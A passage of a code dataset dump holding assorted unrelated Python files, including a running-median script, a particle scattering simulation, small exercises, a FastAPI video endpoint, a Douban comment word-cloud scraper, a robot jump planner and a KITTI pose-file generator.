self.balance()\n\n\ndef get_len_iter(line_iter):\n \"\"\"Get a stream of the number of words per line.\n\n :param line_iter: An iterable object of strings(words concat by space)\n :return: A generator of ints, counting the number of words in each line.\n \"\"\"\n for line in line_iter:\n yield len(line.strip().split(' '))\n\n\ndef parse_opt():\n \"\"\"Parse the command line arguments.\n\n :return: Args that has been parsed\n \"\"\"\n cmd_parser = optparse.OptionParser(\n usage='python3 running_median.py [options]\\n'\n 'Output running medians for the number of words per line.')\n cmd_parser.add_option('-i', '--input', action='store', default='wc_input',\n dest='input',\n help='The input directory to read the text files')\n cmd_parser.add_option('-o', '--output', action='store',\n default='wc_output/med_result.txt', dest='output',\n help='The output path to write the results')\n options, _ = cmd_parser.parse_args()\n return options\n\n\ndef run_stream_from_file(file_name, output, stream):\n \"\"\"Open a file to run the running median algorithm. Use the number of words\n per line as the input data stream\n\n :param file_name: The input file where we use the number of words per line\n as the input data stream\n :param output: An output object to write the result\n :param stream: A RunningMedian object to run the running median\n \"\"\"\n with open(file_name, 'r') as inputfile:\n for number in get_len_iter(inputfile):\n stream.put(number)\n output.write(str(stream.get_median()) + '\\n')\n\n\ndef main():\n options = parse_opt()\n stream = RunningMedian()\n\n with open(options.output, 'w') as output:\n for file_name in util.get_file_names(options.input):\n run_stream_from_file(file_name, output, stream)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/running_median.py","file_name":"running_median.py","file_ext":"py","file_size_in_byte":6918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"415259081","text":"__author__ = 'UID_0'\n__version__ = '0.0.8'\n\ntry:\n import sys\n import time\n import numpy as np\n import itertools as it\n from scipy import arange\n from copy import deepcopy\n from multiprocessing import Pool\n import scipy.integrate as integrate\n from scipy.interpolate import interp1d\n from multiprocessing.dummy import Pool as ThreadPool\nexcept ImportError as e:\n print(\"couldn't load module {}\".format(e))\n\ndef timeit(method):\n def timed(*args, **kwargs):\n ts = time.time()\n result = method(*args, **kwargs)\n te = time.time()\n print('%r %2.2f ms' % (method.__name__, (te - ts)*1000))\n return result\n return timed\n\nclass OverTime(Exception):\n def __init__(self):\n super().__init__(\"Full tau_max is exceed\")\n\nclass StatPy(object):\n \"\"\"\n \"\"\"\n def __init__(self, size = None, mdict = None):\n if (size == None):\n size = 200\n # free surface velocity\n self.vs = 2.00001\n # time accuracy and max time\n self.tau_max = 10\n self.dt = self.tau_max/(size)\n\n self.eps = self.dt/10\n\n self._t = np.zeros(shape = (size + 1, ))\n self._z = np.zeros(shape = (size + 1, ))\n self._v = np.zeros(shape = (size + 1, ))\n\n self.n = np.zeros(shape = (size, ))\n self.v = np.zeros(shape = (size, ))\n self.z = np.zeros(shape = (size, ))\n\n if (mdict == None):\n self.mdict ={\n 'path': 'images/' + 'scattering' + '_',\n 'window_title': 'Particle distribution',\n 'xscale': 'linear',\n 'yscale': 'linear',\n 'xlim_min': 0.8,\n 'xlim_max': 4.0,\n 'ylim_min': 0.0,\n 'ylim_max': 0.12,\n 'set_xlabel': r'$\\frac{\\omega}{2k_0}$',#r'$\\frac{\\omega}{2k_0}$'\n 'set_ylabel': r'$I(\\omega)$'\n }\n elif (isinstance(mdict, dict)):\n self.mdict = mdict\n else:\n raise TypeError(\"Wrong type for mdict!\")\n\n def getAttr(self):\n return deepcopy(self.v), deepcopy(self.n)\n\n def calcTrajectories(self, d, v0, t):\n \"\"\"\n calculate particle trajectories\n t = [], z = [], v = []\n \"\"\"\n a = 0.4*10**(-4)\n tau = 0\n tau_mid = 0\n #shockwave velocity\n vsh = 1.25*self.vs\n\n if (v0 < vsh):\n counter = it.count()\n k = next(counter)\n self._t[k] = 0\n self._z[k] = 0\n self._v[k] = v0\n\n while (tau < self.tau_max):\n k = next(counter)\n tau += self.dt\n self._z[k] = d/(5*a)*np.log(1 + 5.0/d*abs(v0 - self.vs)*tau) + self.vs*tau\n self._v[k] = (v0 - self.vs)/(1 + 5.0/d*(v0 - self.vs)*tau) + self.vs\n self._t[k] = tau\n else:\n counter = it.count()\n k = next(counter)\n #k = 0\n self._t[k] = 0\n self._z[k] = 0\n self._v[k] = v0\n\n try:\n while (tau < self.tau_max):\n tau += self.dt\n if (d*np.log(1 + (1/d)*v0*tau) <= vsh*tau):\n print(d*np.log(1 + (1/d)*v0*tau) - vsh*tau)\n tau_mid = tau\n print(tau)\n break\n else:\n k = next(counter)\n self._z[k] = d/a*np.log(1 + 1/d*v0*tau)\n self._v[k] = v0/(1 + 1/d*v0*tau)\n self._t[k] = tau\n\n if (tau >= self.tau_max):\n print(tau)\n raise OverTime()\n else:\n k = next(counter)\n v_mid = v0/(1 + 1/d*v0*tau_mid)\n self._z[k] = vsh*tau_mid\n self._v[k] = v_mid\n self._t[k] = tau_mid\n\n tau = tau_mid\n\n if (v_mid < self.vs):\n while (tau < self.tau_max):\n k = next(counter)\n tau += self.dt\n self._z[k] = (-d/(5*a)*np.log(1 + 5.0/d*(self.vs-v_mid)*(tau-tau_mid))\n + self.vs*tau + tau_mid*0.25*self.vs)\n self._v[k] = ((v_mid - self.vs)/(1 - 5.0/d*(v_mid - self.vs)*(tau-tau_mid))\n + self.vs)\n self._t[k] = tau\n\n if (v_mid > self.vs):\n while (tau < self.tau_max):\n k = next(counter)\n tau += self.dt\n self._z[k] = (d/(5*a)*np.log(1+5.0/d*(v_mid - self.vs)*(tau - tau_mid))\n + self.vs*tau + tau_mid*0.25*self.vs)\n self._v[k] = ((v_mid - self.vs)/(1 + 5.0/d*(v_mid - self.vs)*(tau - tau_mid))\n + self.vs)\n self._t[k] = tau\n finally:\n idx = np.where(abs(self._t - t) <= self.eps)\n print(idx[0])\n return self._z[idx], self._v[idx]\n #@timeit\n def calcDistr(self, d, t, grid, form = 'quad'):\n \"\"\"\n calculate distribution n(d,u) and u, z main lists for time = t\n \"\"\"\n counter = it.count()\n for item in grid:\n k = next(counter)\n self.n[k] = self.distribution(d, item, form)\n self.z[k], self.v[k] = self.calcTrajectories(d, item, t)\n @timeit\n def d_Distr(self, t, grid):\n \"\"\"\n \"\"\"\n d_max = 100\n f = []\n #f = np.zeros(shape=(d_max, 1), dtype = type)\n v_min = np.zeros(shape=(d_max, ))\n v_max = np.zeros(shape=(d_max, ))\n\n for d in range(1, d_max):\n print('%r percents completed' % d)\n self.calcDistr(d, t, grid)\n v_min[d-1] = min(self.v)\n v_max[d-1] = max(self.v)\n f.append(interp1d(self.v, self.n, bounds_error = False, fill_value = 0.0))\n\n items = np.zeros_like(self.n)\n grid_new = np.linspace(min(v_min), max(v_max), len(grid))\n\n for item in f:\n items = items + item(grid_new)\n self.n = np.array(items, copy = False)\n self.v = np.array(grid_new, copy = False)\n return\n\n def tau(self, t, grid):\n \"\"\"\n \"\"\"\n def v(z):\n idx = np.where(self.z == z)\n return self.v[idx]\n\n d_max = 100\n f = []\n z_min = np.zeros(shape=(d_max, ))\n z_max = np.zeros(shape=(d_max, ))\n\n for d in range(1, d_max):\n print(d)\n self.calcDistr(d, t, grid)\n z_min[d-1] = min(self.z)\n z_max[d-1] = max(self.z)\n f.append(interp1d(self.z, self.n*self.v, bounds_error = False, fill_value = 0.0))\n\n items = np.zeros_like(self.n)\n grid_new = np.linspace(min(z_min), max(z_max), len(grid))\n\n for item in f:\n items = items + item(grid_new)\n self.n = np.array(items, copy = False)\n self.z = np.array(grid_new, copy = False)\n return deepcopy(self.z), deepcopy(self.n)\n @timeit\n def calcIntensity(self, t):\n grid_w = np.linspace(self.vs/2, 2*self.vs, 200)\n\n d_max = 100\n f = []\n v_min = np.zeros(shape=(d_max, ))\n v_max = np.zeros(shape=(d_max, ))\n\n for d in range(1, d_max):\n print(d)\n self.calcDistr(d, t, grid_w)\n v_min[d-1] = min(self.v)\n v_max[d-1] = max(self.v)\n f.append(interp1d(self.v, np.exp(-2*self.n*self.v)*self.n,\n bounds_error = False, fill_value = 0.0))\n\n items = np.zeros_like(np.exp(-2*self.n*self.v)*self.n)\n grid_new = np.linspace(min(v_min), max(v_max), len(grid_w))\n\n for item in f:\n items = items + item(grid_new)\n self.n = np.array(items, copy = False)\n self.v = np.array(grid_new, copy = False)\n return\n\n @staticmethod\n def distribution(d, v, form = None, delta = 0.2):\n \"\"\"\n exponential approximation of Sorenson data\n \"\"\"\n if (form == None):\n form = 'zero'\n a = -0.418714 + 0.586249*v -0.0608715*v**2\n A = (np.pi/6)*(integrate.quad(lambda d: d**3*np.exp(-a*d), 1, 100)[0])\n A = (1/delta)*np.exp(-(v-1)/delta)/A\n #A = (3/4*np.pi)*(1/delta)*np.exp(-(v-1)/delta)*np.exp(a)*a**4/(6 + 6*a + 3*a**2 + a**3)\n\n mdict ={\n 'zero': A*np.exp(-a*d),\n 'quad': A*np.exp(-a*d)*d**2,\n 'cubic': A*np.exp(-a*d)*d**3\n }\n return mdict[form]\n\n def plotDistr(self, d, t, graphType = None):\n \"\"\"\n plots a histogram\n \"\"\"\n import matplotlib\n matplotlib.rcParams['text.usetex'] = True\n import matplotlib.pylab as pl\n import numpy as np\n\n fig = pl.figure(figsize = (11,11))\n fig.canvas.set_window_title(self.mdict['window_title'])\n\n plot = fig.add_subplot(1, 1, 1)\n plot.set_xscale(self.mdict['xscale'])\n plot.set_yscale(self.mdict['yscale'])\n #plot.set_xlim(self.mdict['xlim_min'], self.mdict['xlim_max'])\n #plot.set_ylim(self.mdict['ylim_min'], self.mdict['ylim_max'])\n plot.tick_params(axis = 'both', which = 'major', labelsize = 28)\n plot.set_xlabel(r'' + self.mdict['set_xlabel'], fontsize = 28)\n plot.set_ylabel(r'' + self.mdict['set_ylabel'], fontsize = 28)\n plot.set_title(r'$\\frac{t}{t_{0}}=$' +' '+ str(t) + ', '\n + r'$t_{0} = \\frac{d_{min}}{av_s}$'\n + ', ' + r'$d_{min} = 1~\\mu m$',fontsize = 28)\n try:\n pl.grid(True)\n if (graphType == None):\n pl.hist(self.v, bins = 50, weights = self.n, normed = False,\n label = 'd = ' + str(d) + r'$\\mu m$')\n else:\n pl.plot(self.v, self.n)\n #pl.legend()\n pl.savefig(self.mdict['path'] + 't=' + str(t) + 'd=' + str(d) + '.png')\n except Exception as e:\n print('{}'.format(e))\n finally:\n #pl.show()\n pl.close()\n return\n\ndef makeGrid(v_min, v_max, size = None):\n \"\"\"\n \"\"\"\n if (size == None):\n size = 200\n return np.linspace(v_min, v_max, size)\n\ndef main():\n t = 0.0\n stat = StatPy()\n grid = makeGrid(1, 4)\n stat.calcTrajectories(10, 4.0, t)\n #stat.calcDistr(1, t, grid)\n #stat.tau(t, grid)\n #stat.d_Distr(t, grid)\n #stat.calcIntensity(t)\n #stat.plotDistr('d', t, graphType = 'plot')\n\nif __name__ == '__main__':\n main()\n","sub_path":"intensity_test.py","file_name":"intensity_test.py","file_ext":"py","file_size_in_byte":11109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"181098486","text":"import datetime\n\ndef main(j, args, params, tags, tasklet):\n guid = args.getTag('id')\n if not guid:\n out = 'Missing NIC guid param \"guid\"'\n params.result = (out, args.doc)\n return params\n\n nic = j.core.portal.active.osis.get('system', 'nic', guid)\n if not nic:\n params.result = ('NIC with guid %s not found' % guid, args.doc)\n return params\n\n def objFetchManipulate(id):\n nic['lastcheck'] = datetime.datetime.fromtimestamp(nic['lastcheck']).strftime('%Y-%m-%d %H:%M:%S')\n nic['ipaddr'] = ', '.join([str(x) for x in nic['ipaddr']])\n return nic\n\n push2doc=j.apps.system.contentmanager.extensions.macrohelper.push2doc\n\n return push2doc(args,params,objFetchManipulate)\n\ndef match(j, args, params, tags, tasklet):\n return True\n","sub_path":"apps/gridportal/base/Grid/.macros/wiki/nic/1_nic.py","file_name":"1_nic.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"130094209","text":"# PYTHON3 FILE\n\n# Create a new empty list\nnumlist = list()\nwhile True:\n inp = input('Enter a number or done : ')\n if inp == 'done' : break\n # Convert the value to a float number\n value = float(inp)\n # Add value to the list\n numlist.append(value)\n # Average using built in functions\naverage = sum(numlist)/len(numlist)\nprint('Average :', average)\n","sub_path":"PythonDatastructures/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"116289372","text":"#! python3\r\n#magic 8 ball with switch dictionary\r\n\r\nimport random\r\nfrom time import sleep\r\n\r\ndef getAnswer(answerNumber):\r\n response = {\r\n 1: 'It is certain',\r\n 2: 'It is decidedly so',\r\n 3: 'Yes',\r\n 4: 'Reply hazy, try again',\r\n 5: 'Ask again later',\r\n 6: 'Concentrate and ask again',\r\n 7: 'My reply is no',\r\n 8: 'Outlook not so good',\r\n }\r\n return response.get(answerNumber, \"fortune teller is unavailable\")\r\n\r\ndef fortune():\r\n r = random.randint(1,9)\r\n print (\"Ask the Magic 8 ball a question to see your fortune:\")\r\n input()\r\n print('Behold your fortune in')\r\n print('...3')\r\n sleep(1)\r\n print('...2')\r\n sleep(1)\r\n print('...1')\r\n sleep(1)\r\n print (getAnswer(r))\r\n\r\nfortune()\r\n","sub_path":"magic8ball.py","file_name":"magic8ball.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"535592957","text":"from distutils.core import setup, Extension\nimport os\n\nmodule1 = Extension('envi2numpy',\n sources = ['pythonwrapper.cpp', 'INIReader.cpp','ini.c','cnpy.cpp','envi_parser.cpp'],\n include_dirs = [],\n\t\textra_compile_args=['-std=c++11','-O2'])\n\nsetup (name = 'envi2numpy',\n version = '1.1',\n description = 'Package used for reading hyperspectral captures',\n ext_modules = [module1],\n\n url='https://github.com/ArendJanKramer/envi2numpy',\n\n # Author details\n author='Arend Jan Kramer',\n author_email='github@arendjan.eu',\n\n # Choose your license\n license='MIT'\n)\n\n","sub_path":"pypi_install_script/envi2numpy-1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"55597898","text":"from fastapi import FastAPI, UploadFile, File, requests\nfrom fastapi.responses import FileResponse, RedirectResponse\nimport cv2\napp = FastAPI()\n\n\n@app.get(\"/\")\nasync def main():\n return {\"Hello\": \"World!\"}\n\ndef process_video(file_name):\n # Read video file\n cap = cv2.VideoCapture(file_name)\n\n # get height, width and frame count of the video\n width, height = (\n int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)),\n int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n )\n fps = int(cap.get(cv2.CAP_PROP_FPS))\n\n # Define the codec and create VideoWriter object\n fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')\n out = cv2.VideoWriter()\n output_file_name = \"output.mp4\"\n out.open(output_file_name, fourcc, fps, (width, height), True)\n\n try:\n while cap.isOpened():\n ret, frame = cap.read()\n if not ret:\n break\n \n im = frame\n out.write(im)\n except Exception as _:\n # Release resources\n cap.release()\n out.release()\n \n\n # Release resources\n cap.release()\n out.release()\n\n@app.post(\"/video_upload\")\nasync def upload_video(file: UploadFile = File(...)):\n extension = file.filename.split(\".\")[-1] in (\"mp4\", \"avi\")\n if not extension:\n return \"Video must in mp4 or wav format!\"\n process_video(file.filename)\n return FileResponse(\"output.mp4\", media_type=\"video/mp4\")\n\n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"454572286","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n#Defining Python Source Code Encodings\n#---------------------------\n\n# import the necessary packages\nimport time\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\narray = np.zeros((5,3))\n#array = [gerade, rechts, links]\n# = [......, ....., ...... \n# ......, ....., ......]\nn = 0\nold ='kein'\n\ndef intell(angle):\n global array, n, old\n angle = int(np.median(angle))\n array[n] = 0\n if abs(angle) >= 85:\n array[n][0] = 1\n old = 'gerade'\n n += 1\n elif angle > 0 and abs(angle) < 85: #drehe rechts\n array[n][1] = 1\n old = 'rechts'\n n += 1\n elif angle < 0 and abs(angle) < 85:\n array[n][2] = 1\n old = 'links'\n n += 1\n\n if n > 4:\n n = 0 \n\n summe = sum(array)\n maxi = max(summe)\n\n if maxi == summe[0] and maxi != summe[1] and maxi != summe[2]:\n old = 'gerade'\n return 'gerade'\n elif maxi == summe[1] and maxi != summe[2] and maxi != summe[0]:\n old = 'rechts'\n return 'rechts'\n elif maxi == summe[2] and maxi != summe[0] and maxi != summe[1]:\n old = 'links'\n return 'links'\n else:\n return old\n \n\n\n","sub_path":"Code/Video/SW13/Intelligenz/Intelligenz.py","file_name":"Intelligenz.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"376587576","text":"\"\"\"\npython 豆瓣爬虫词云\n\"\"\"\nimport re\nimport jieba\nimport pandas as pd\nfrom urllib import request\nfrom bs4 import BeautifulSoup as bs\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom wordcloud import WordCloud\n\nimport numpy as np\n\nCommentList = []\n\nfor a in range(11):\n url = 'https://movie.douban.com/subject/11537954/comments?start={}&limit=20'.format(a*20)\n resp = request(url)\n html_data = resp.read().decode('utf-8')\n # 第二个参数是指定解析器\n soup = bs(html_data, 'html.parser')\n comment_eachpage = soup.find_all('div', class_='comment')\n for item in comment_eachpage: \n if item.find_all('p')[0].find('span').string is not None:\n CommentList.append(item.find_all('p')[0].find('span').string)\n\nallcomments = ''\nfor k in range(len(CommentList)):\n allcomments = allcomments + (CommentList[k]).strip()\n\n\n\npattern = re.compile('[\\u4e00-\\u9fa5]+')\nfilterdata = re.findall(pattern, allcomments)\ncomments_zh = ''.join(filterdata) \n\n\nsegment = jieba.lcut(comments_zh)\nwords_detail=pd.DataFrame({'segment':segment})\n\nstopwords=pd.read_csv(r\"D:\\myprograms\\douban\\moviecontent\\chineseStopWords.txt\", index_col=False,quoting=3,sep=\"\\t\",names=['stopword'], encoding=u'gbk')\nwords_detail=words_detail[~words_detail.segment.isin(stopwords.stopword)] \n\n\nwords_result=words_detail.groupby(by=['segment'])['segment'].agg({\"countnum\":np.size})\nwords_result=words_result.reset_index().sort_values(by=[\"countnum\"],ascending=False)\n\n\nmatplotlib.rcParams['figure.figsize'] = (10.0, 5.0)\n\n\nwordcloud=WordCloud(font_path=\"simhei.ttf\",background_color=\"white\",max_font_size=80)\nword_frequence = {x[0]:x[1] for x in words_result.head(1000).values}\n\n\nwordcloud=wordcloud.fit_words(word_frequence)\nfig = plt.gcf()\nplt.imshow(wordcloud)\nfig.savefig('rick&morty.png', dpi=100)","sub_path":"cn/crawer/01DouBan.py","file_name":"01DouBan.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"30490505","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport rospy\n\nfrom walking_py import geom\nfrom walking_py import contact\nfrom walking_py import integrated_plan\nimport walking_ros\n\nfrom sample_hrp2_walk import SampleHrp2Walk\n\n\nclass SampleHrp2Jump(SampleHrp2Walk):\n def plan(self):\n initial_stance = contact.Stance(\n [contact.Contact(\"lleg_end_coords\", geom.Frame.new(np.array([0., 0.105, 0.]))),\n contact.Contact(\"rleg_end_coords\", geom.Frame.new(np.array([0., -0.105, 0.])))])\n lleg_cnt1 = contact.Contact(\"lleg_end_coords\", geom.Frame.new(np.array([0.4, 0.105, 0.])))\n rleg_cnt1 = contact.Contact(\"rleg_end_coords\", geom.Frame.new(np.array([0.4, -0.105, 0.])))\n cnt_action_seq = [contact.ContactAction(initial_stance.contact(\"lleg_end_coords\"), 1.00, contact.ContactAction.detach),\n contact.ContactAction(initial_stance.contact(\"rleg_end_coords\"), 1.05, contact.ContactAction.detach),\n contact.ContactAction(lleg_cnt1, 1.25, contact.ContactAction.attach),\n contact.ContactAction(rleg_cnt1, 1.30, contact.ContactAction.attach)]\n initial_jposs = np.zeros(self.robot.njoint)\n initial_jposs[self.robot.joints.index(self.robot.joint(\"LLEG_JOINT3\"))] = 0.5\n initial_jposs[self.robot.joints.index(self.robot.joint(\"RLEG_JOINT3\"))] = 0.5\n\n self.integrated_planner = integrated_plan.IntegratedMotionPlanner(\n self.robot,\n dt=0.03)\n\n self.integrated_planner.run(\n initial_stance,\n cnt_action_seq,\n cnt_traj_conv_run_kwargs={\n \"final_period\": 1.0,\n \"cog_offset\": np.array([0.03, 0., 0.6])},\n centroid_plan_init_kwargs={\n \"horizon_z\": 60,\n \"horizon_xy\": 30},\n centroid_plan_run_kwargs={\n \"mpc_xy_kwargs\": {\n \"state_weight\": np.array([1e1, 1e2, 1e1, 1e2, 1e3, 1e3]),\n \"final_state_weight\": np.array([1e1, 1e2, 1e1, 1e2, 1e3, 1e3])}},\n fullbody_plan_run_kwargs={\n \"initial_jposs\": initial_jposs,\n \"initial_ik_kwargs\": {\n \"jlist\": self.ik_jlist},\n \"ik_kwargs\": {\n \"jlist\": self.ik_jlist,\n \"trg_momentum_weight\": np.array([1e-4, 1e-4, 1e-4, 1e-4, 1e-4, 1e-4])}})\n\n\nif __name__ == \"__main__\":\n demo = SampleHrp2Jump(\"sample_hrp2_jump\")\n demo.main()\n","sub_path":"walking/walking_ros/samples/sample_hrp2_jump.py","file_name":"sample_hrp2_jump.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"650080800","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass WorkspacePurgeResponse(Model):\n \"\"\"Response containing operationId for a specific purge action.\n\n All required parameters must be populated in order to send to Azure.\n\n :param operation_id: Required. Id to use when querying for status for a\n particular purge operation.\n :type operation_id: str\n \"\"\"\n\n _validation = {\n 'operation_id': {'required': True},\n }\n\n _attribute_map = {\n 'operation_id': {'key': 'operationId', 'type': 'str'},\n }\n\n def __init__(self, **kwargs):\n super(WorkspacePurgeResponse, self).__init__(**kwargs)\n self.operation_id = kwargs.get('operation_id', None)\n","sub_path":"sdk/loganalytics/azure-mgmt-loganalytics/azure/mgmt/loganalytics/models/workspace_purge_response.py","file_name":"workspace_purge_response.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"26047759","text":"class tower:\n\tdef __init__(self,i):\n\t\tself.disks = []\n\t\tself.index = i \n\n\tdef index(self):\n\t\treturn self.index\n\n\tdef add(self,d):\n\t\tif self.disks:\n\t\t\tif self.disks[-1] <= d:\n\t\t\t\traise Exception('Error placing disk' + d)\n\t\tself.disks.append(d)\n\n\tdef moveTopTo(self,t):\n\t\tif self.disks:\n\t\t\ttop = self.disks.pop()\n\t\t\tt.add(top)\n\n\tdef moveDisks(self,n,destination,buffer):\n\t\tif n > 0:\n\t\t\tself.moveDisks(n-1,buffer,destination)\n\t\t\tself.moveTopTo(destination)\n\t\t\tbuffer.moveDisks(n-1,destination,self)\n\ndef printTowers(t):\n\tindex = 0\n\tfor i in t:\n\t\tprint(f'Tower {index}:', end = ' ')\n\t\tprint(i.disks)\n\t\tindex += 1\n\ndef main():\n\tn = 10\n\ttowers = [tower(i) for i in range(3)]\n\n\tfor i in range(n,0,-1):\n\t\ttowers[0].add(i)\n\n\tprintTowers(towers)\n\ttowers[0].moveDisks(n,towers[2],towers[1])\n\tprintTowers(towers)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Chapter 8/8.6.py","file_name":"8.6.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"393941268","text":"\"\"\"Calculate camera pose and write to a file inside the original kitti folder\"\"\"\nimport itertools\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport pykitti\nimport os\n\ndef write_file(filename, path, Ts):\n out_path = os.path.join(path, filename)\n with open(out_path, 'w') as f:\n f.write( \"\\n\".join( \" \".join(map(str, x.reshape(-1)[:12])) for x in Ts) )\n\ndef generate_pose_file(basedir, date, drive, seq_path):\n # Load the data. Optionally, specify the frame range to load.\n dataset = pykitti.raw(basedir, date, drive)\n # dataset = pykitti.raw(basedir, date, drive, frames=range(0, 5, 5))\n\n ## loop over all frames, calculate camera pose and write to a file\n T_cam2_imu = dataset.calib.T_cam2_imu\n T_imu_cam2 = np.linalg.inv(T_cam2_imu)\n T_cam3_imu = dataset.calib.T_cam3_imu\n T_imu_cam3 = np.linalg.inv(T_cam3_imu)\n T_velo_imu = dataset.calib.T_velo_imu\n T_imu_velo = np.linalg.inv(T_velo_imu)\n\n T_w_imus = []\n\n T_w_cam2s = []\n T_cam20_cam2s = []\n\n T_w_cam3s = []\n T_cam30_cam3s = []\n\n T_w_velos = []\n T_velo0_velos = []\n for oxt in dataset.oxts:\n T_w_imus.append(oxt.T_w_imu)\n\n T_w_cam2 = np.dot(oxt.T_w_imu, T_imu_cam2)\n T_w_cam2s.append(T_w_cam2)\n T_cam20_cam2s.append( np.dot(np.linalg.inv(T_w_cam2s[0]), T_w_cam2) )\n\n T_w_cam3 = np.dot(oxt.T_w_imu, T_imu_cam3)\n T_w_cam3s.append(T_w_cam3)\n T_cam30_cam3s.append( np.dot(np.linalg.inv(T_w_cam3s[0]), T_w_cam3) )\n\n T_w_velo = np.dot(oxt.T_w_imu, T_imu_velo)\n T_w_velos.append(T_w_velo)\n T_velo0_velos.append( np.dot(np.linalg.inv(T_w_velos[0]), T_w_velo) )\n\n\n out_file_folder = os.path.join(seq_path, 'poses')\n if not os.path.exists(out_file_folder):\n os.mkdir(out_file_folder)\n\n out_file = 'imu.txt'\n write_file(out_file, out_file_folder, T_w_imus)\n\n out_file = 'cam_02.txt'\n write_file(out_file, out_file_folder, T_w_cam2s)\n\n out_file = 'cam_03.txt'\n write_file(out_file, out_file_folder, T_w_cam3s)\n \n out_file = 'velo.txt'\n write_file(out_file, out_file_folder, T_w_velos)\n\n\n# Change this to the directory where you store KITTI data\nbasedir = '/media/sda1/minghanz/datasets/kitti/kitti_data'\n\n# # Specify the dataset to load\n# date = '2011_09_26'\n# drive = '0001'\n\n## loop over all sequences\ndates = os.listdir(basedir)\ndates = [date for date in dates if os.path.isdir(os.path.join(basedir, date) ) ]\n\nfor date in dates:\n date_path = os.path.join(basedir, date)\n seqs = os.listdir(date_path)\n seqs = [seq for seq in seqs if os.path.isdir(os.path.join(date_path, seq))]\n for seq in seqs:\n seq_path = os.path.join(date_path, seq)\n seq_n = seq.split('_drive_')[1].split('_')[0]\n \n print(date, seq_n)\n generate_pose_file(basedir, date, seq_n, seq_path)","sub_path":"demos/demo_write_pose_file.py","file_name":"demo_write_pose_file.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"457188422","text":"class ProgramCmd:\n def __init__(self, norad_id, ground_station_id, start_date, end_date, observation_status, working_dir, payloads, waterfalls, demoddata, payload_modules, demoddata_modules, waterfall_modules):\n self.norad_id = norad_id\n self.ground_station_id = ground_station_id\n self.start_date = start_date\n self.end_date = end_date\n self.working_dir = working_dir\n self.payloads = payloads\n self.waterfalls = waterfalls\n self.demoddata = demoddata\n self.payload_modules = payload_modules\n self.demoddata_modules = demoddata_modules\n self.waterfall_modules = waterfall_modules\n self.observation_status = observation_status","sub_path":"domain/parameters/programCmd.py","file_name":"programCmd.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"241646285","text":"import asyncio\nimport httpx\nfrom pprint import pprint\n\n\nasync def do_gets():\n resp = await httpx.get(\"https://httpbin.org/get\")\n pprint(resp.json())\n print(f\"Status Code: {resp.status_code}\")\n return resp\n\n\nasync def do_posts():\n # don't post any data\n resp = await httpx.post(\"https://httpbin.org/post\")\n pprint(resp.json())\n print(f\"Status Code: {resp.status_code}\")\n\n\nif __name__ == \"__main__\":\n asyncio.run(do_gets())\n asyncio.run(do_posts())\n","sub_path":"async_example.py","file_name":"async_example.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"359646706","text":"from tkinter import ttk\nfrom main_content_frames.data_section_frames.classes_section.classesWindow import ClassesWindow\nfrom main_content_frames.data_section_frames.webcam_section.dataWebcamSectionFrame import DataWebcamSectionFrame\n\n\n# a frame that contains the classes section inside the dataFrame\n# contains the scrollable class window and the \"add class\" button.\nclass ClassesSectionFrame(ttk.Frame):\n def __init__(self, container: ttk.Frame, webcam_section_frame: DataWebcamSectionFrame, **kwargs):\n super().__init__(container, **kwargs)\n\n # row & col config:\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n\n # --layout--\n\n # row 0: scrollable classes window\n self.classes_window = ClassesWindow(self)\n self.classes_window.grid(row=0, column=0, padx=5, pady=5, sticky=\"NSEW\")\n\n # row 1: add class button\n # addClass button:\n add_button = 